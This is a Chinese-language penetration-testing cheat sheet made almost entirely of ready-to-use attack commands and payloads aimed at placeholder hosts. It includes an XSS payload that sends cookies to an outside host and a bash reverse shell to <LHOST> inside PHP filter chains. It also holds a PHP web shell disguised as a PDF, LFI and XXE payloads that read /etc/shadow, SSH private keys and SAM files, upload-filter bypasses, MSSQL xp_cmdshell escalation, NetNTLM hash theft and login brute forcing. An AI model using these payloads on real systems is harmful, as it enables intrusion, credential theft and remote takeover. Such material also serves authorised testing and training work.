NetBIOS服务:137端口~139端口

1
2
nbtscan <RHOST>
nmblookup -A <RHOST>

nmap端口扫描工具

1
2
3
4
5
6
7
8
sudo nmap -A -T4 -sC -sV -p- <RHOST>
sudo nmap -sV -sU <RHOST>
sudo nmap -A -T4 -sC -sV --script vuln <RHOST>
sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <RHOST>
sudo nmap -sC -sV -p- --scan-delay 5s <RHOST>
sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <RHOST>
ls -lh /usr/share/nmap/scripts/*ssh*
locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb

端口扫描

1
for p in {1..65535}; do nc -vn <RHOST> $p -w 1 -z & done 2> <FILE>.txt
1
export ip=<RHOST>; for port in $(seq 1 65535); do timeout 0.01 bash -c "</dev/tcp/$ip/$port && echo The port $port is open || echo The Port $port is closed > /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done

snmpwalk 工具使用

1
2
3
4
5
6
7
8
9
10
11
snmpwalk -c public -v1 <RHOST>
snmpwalk -v2c -c public <RHOST> 1.3.6.1.2.1.4.34.1.3
snmpwalk -v2c -c public <RHOST> .1
snmpwalk -v2c -c public <RHOST> nsExtendObjects
snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.25
snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.25.4.2.1.2
snmpwalk -c public -v1 <RHOST> .1.3.6.1.2.1.1.5
snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.3.1.1
snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.27
snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.6.13.1.3
snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.25.6.3.1.2

WEB应用分析工具

Burp Suite 工具

1
2
3
4
Ctrl+r          // 向中继器发送请求
Ctrl+i          // 向入侵者发送请求
Ctrl+Shift+b    // base64编码
Ctrl+Shift+u    // URL解码

设置代理环境变量

1
2
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=https://localhost:8080

cadaver 用于 WebDAV 协议的服务器进行交互

1
cadaver http://<RHOST>/<WEBDAV_DIRECTORY>/
1
2
3
dav:/<WEBDAV_DIRECTORY>/> cd C
dav:/<WEBDAV_DIRECTORY>/C/> ls
dav:/<WEBDAV_DIRECTORY>/C/> put <FILE>

跨站脚本 (XSS)

1
2
3
4
5
6
7
8
<sCrIpt>alert(1)</ScRipt>
<script>alert('XSS');</script>
<script>alert(document.cookies)</script>
<script>document.querySelector('#foobar-title').textContent = '<TEXT>'</script>
<script>fetch('https://<RHOST>/steal?cookie=' + btoa(document.cookie));</script>
<script>user.changeEmail('user@domain');</script>
<iframe src=file:///etc/passwd height=1000px width=1000px></iframe>
<img src='http://<RHOST>'/>

FUFF

1
2
3
4
5
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ --fs <NUMBER> -mc all
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ --fw <NUMBER> -mc all
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ -mc 200,204,301,302,307,401 -o results.txt
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<RHOST>/ -H "Host: FUZZ.<RHOST>" -fs 185
ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<RHOST>/backups/backup_2020070416FUZZ.zip
API 接口模糊测试
1
ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412
搜索 LFI 本地文件包含漏洞
1
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349
使用 PHP SESSION ID 进行模糊测试
1
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt  -u "http://<RHOST>/admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644
目录递归扫描
1
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/basic/FUZZ -recursion
设置固定的文件扩展名扫描
1
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/ext/logs/FUZZ -e .log
速率限制
1
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://<RHOST>/cd/rate/FUZZ -mc 200,429
虚拟主机子域名扫描
1
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -fs 1495
海量文件扩展名发现扫描
1
ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip

GitTools

1
2
3
# 下载地址:https://github.com/internetwache/GitTools
./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/FOLDER
./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/

Gobuster 扫描工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
-e    // 呈现完整url的扩展模式
-k    // 跳过ssl证书验证
-r    // 遵循cedirects
-s    // 状态代码
-b    // 排除状态代码
-k            // 忽略证书
--wildcard    // 设置通配符选项

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>/ -x php

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<RHOST>/ -x php,txt,html,js -e -s 200

$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://<RHOST>:<RPORT>/ -b 200 -k --wildcard
常见文件扩展名
1
txt,bak,php,html,js,asp,aspx
常见图片扩展
1
png,jpg,jpeg,gif,bmp
目录扫描
1
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://<RHOST>/api/ -e -s 200
DNS扫描
1
2
3
gobuster dns -d <RHOST> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
虚拟主机子域名发现扫描
1
2
3
gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
指定用户代理
1
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/ -a Linux

本地文件包含 (LFI)

1
2
3
http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd
截止到PHP 5.3 版本的漏洞
1
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd%00
空字节
1
2
%00
0x00
编码遍历字符串
1
2
3
4
5
6
7
8
9
10
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
PHP://过滤器包装器

参考文章: https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb
参考文章地址: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
参考文章地址: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter

1
url=php://filter/convert.base64-encode/resource=file:////var/www/<RHOST>/api.php
1
2
3
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
base64 -d <FILE>.php
Django、Rails 或 Node.js Web 应用程序标头值
1
2
3
4
5
6
7
Accept: ../../../../.././../../../../etc/passwd{{
Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{
Linux文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/knockd.conf
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/motd
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/passwd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cmdline
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/<PID>/cmdline
/proc/<PID>/maps
/proc/sched_debug
/proc/self/cwd/app.py
/proc/self/environ
/proc/self/net/arp
/proc/stat
/proc/swaps
/proc/version
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/html<VHOST>/__init__.py
/var/www/html/db_connect.php
/var/www/html/utils.php
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
Windows文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

PDF PHP 包含

创建一个带有 PDF 标头的文件,其中包含 PHP 代码。

1
2
3
4
5
%PDF-1.4

<?php
    system($_GET["cmd"]);
?>

利用示例:

1
http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami

PHP 上传过滤器绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
.sh
.cgi
.inc
.txt
.pht
.phtml
.phP
.Php
.php3
.php4
.php5
.php7
.pht
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.jpeg
1
2
3
4
5
6
7
8
9
10
11
<FILE>.php%20
<FILE>.php%0d%0a.jpg
<FILE>.php%0a
<FILE>.php.jpg
<FILE>.php%00.gif
<FILE>.php\x00.gif
<FILE>.php%00.png
<FILE>.php\x00.png
<FILE>.php%00.jpg
<FILE>.php\x00.jpg
mv <FILE>.jpg <FILE>.php\x00.jpg

PHP 过滤器链生成器

参考链接: https://github.com/synacktiv/php_filter_chain_generator

1
2
3
4
5
python3 php_filter_chain_generator.py --chain '<?= exec($_GET[0]); ?>'
python3 php_filter_chain_generator.py --chain "<?php echo shell_exec(id); ?>"
python3 php_filter_chain_generator.py --chain """<?php echo shell_exec(id); ?>"""
python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"");?>""""
python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"");?>""""
1
http://<RHOST>/?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4
1
2
3
python3 php_filter_chain_generator.py --chain '<?= exec($_GET[0]); ?>'
[+] The following gadget chain will generate the following code : <?= exec($_GET[0]); ?> (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=<COMMAND>

PHP 通用小工具链 (PHPGGC)

1
phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/<FILE>.txt /PATH/TO/FILE/<FILE>.txt

服务器端请求伪造 (SSRF)

1
https://<RHOST>/item/2?server=server.<RHOST>/file?id=9&x=

服务器端模板注入 (SSTI)

模糊字符串

参考链接: https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti

1
${{<%[%'"}}%\.
Magic Payload

参考链接: https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee

1
{{ ‘’.__class__.__mro__[1].__subclasses__() }}

上传漏洞

1
2
3
4
5
6
7
8
9
10
ASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution
SVG: Stored XSS / Server-Side Request Forgery
GIF: Stored XSS
CSV: CSV Injection
XML: XXE
AVI: Local File Inclusion / Server-Side request Forgery
HTML/JS: HTML Injection / XSS / Open Redirect
PNG / JPEG: Pixel Flood Attack
ZIP: Remote Code Exection via Local File Inclusion
PDF / PPTX: Server-Side Request Forgery / Blind XXE

WFUZZ扫描工具

1
wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://<RHOST>/FUZZ/<FILE>.php --hc '403,404'
写入文件
1
wfuzz -w /PATH/TO/WORDLIST -c -f <FILE> -u http://<RHOST> --hc 403,404
输出有限的自定义扫描
1
wfuzz -w /PATH/TO/WORDLIST -u http://<RHOST>/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20
一次模糊测试两个参数
1
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
子域名扫描枚举
1
wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.<RHOST>' -u http://<RHOST>/
虚拟主机子域名扫描枚举
1
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<RHOST>" --hc 200 --hw 356 -t 100 <RHOST>
GET型目录枚举扫描
1
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://<RHOST>/FUZZ --hc 403,404
POST登录爆破枚举扫描
1
2
3
wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "email=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --hc 200 -c

wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "username=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --ss "Invalid login"
SQL枚举扫描
1
wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://<RHOST>/select http
虚拟主机子域名系统扫描
1
2
3
4
5
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ.<RHOST>" --filter "r.headers.response~'Access-Control-Allow-Origin'" http://<RHOST>/

wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -t 100

wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> --hw <value> -t 100
对文件进行编号
1
wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip
枚举 PID
1
wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000

WPSCAN 扫描工具

1
2
3
4
5
wpscan --url https://<RHOST> --enumerate u,t,p
wpscan --url https://<RHOST> --plugins-detection aggressive
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u,t,p
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50

XML 外部实体 (XXE)

恶意文件有效负载请求
1
2
3
4
5
6
7
8
9
10
11
GET / HTTP/1.1
Host: <RHOST>:<RPORT>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 136

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://<LHOST>:80/shell.php" >]>
<foo>&xxe;</foo>
有效载荷
1
2
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xxe [ <!ENTITY passwd SYSTEM 'file:///etc/passwd'> ]>
 <stockCheck><productId>&passwd;</productId><storeId>1</storeId></stockCheck>
1
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]><order><quantity>3</quantity><item>&test;</item><address>17th Estate, CA</address></order>
1
username=%26username%3b&version=1.0.0--><!DOCTYPE+username+[+<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!--

数据库分析工具

impacket-mssqlclient

常用命令
1
2
enum_logins
enum_impersonate
连接并登录
1
2
3
impacket-mssqlclient <USERNAME>@<RHOST>
impacket-mssqlclient <USERNAME>@<RHOST> -windows-auth
sudo mssqlclient.py <RHOST>/<USERNAME>:<USERNAME>@<RHOST> -windows-auth
1
2
export KRB5CCNAME=<USERNAME>.ccache # (导入票据)
impacket-mssqlclient -k <RHOST>.<DOMAIN>
权限提升
1
2
3
exec_as_login sa
enable_xp_cmdshell
xp_cmdshell whoami

MongoDB数据库

1
mongo "mongodb://localhost:27017"

基本操作:

1
2
3
4
5
6
7
8
9
10
> use <DATABASE>;
> show tables;
> show collections;
> db.system.keys.find();
> db.users.find();
> db.getUsers();
> db.getUsers({showCredentials: true});
> db.accounts.find();
> db.accounts.find().pretty();
> use admin;
用户密码重置为“12345”
1
> db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })

MSSQL数据库

连接并登录
1
2
sqlcmd -S <RHOST> -U <USERNAME>
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>'
显示数据库内容
1
2
1> SELECT name FROM master.sys.databases
2> go
开放查询
1
2
1> select * from openquery("web\clients", 'select name from master.sys.databases');
2> go
1
2
1> select * from openquery("web\clients", 'select name from clients.sys.objects');
2> go
将数据库文件BASE64编码后放入本地TXT文件中
1
2
1> select cast((select content from openquery([web\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64;
2> go > export.txt
窃取 NetNTLM Hash 哈希 / 中继攻击
1
SQL> exec master.dbo.xp_dirtree '\\<LHOST>\FOOBAR'
关联 SQL 服务器枚举
1
2
3
4
5
6
SQL> SELECT user_name();
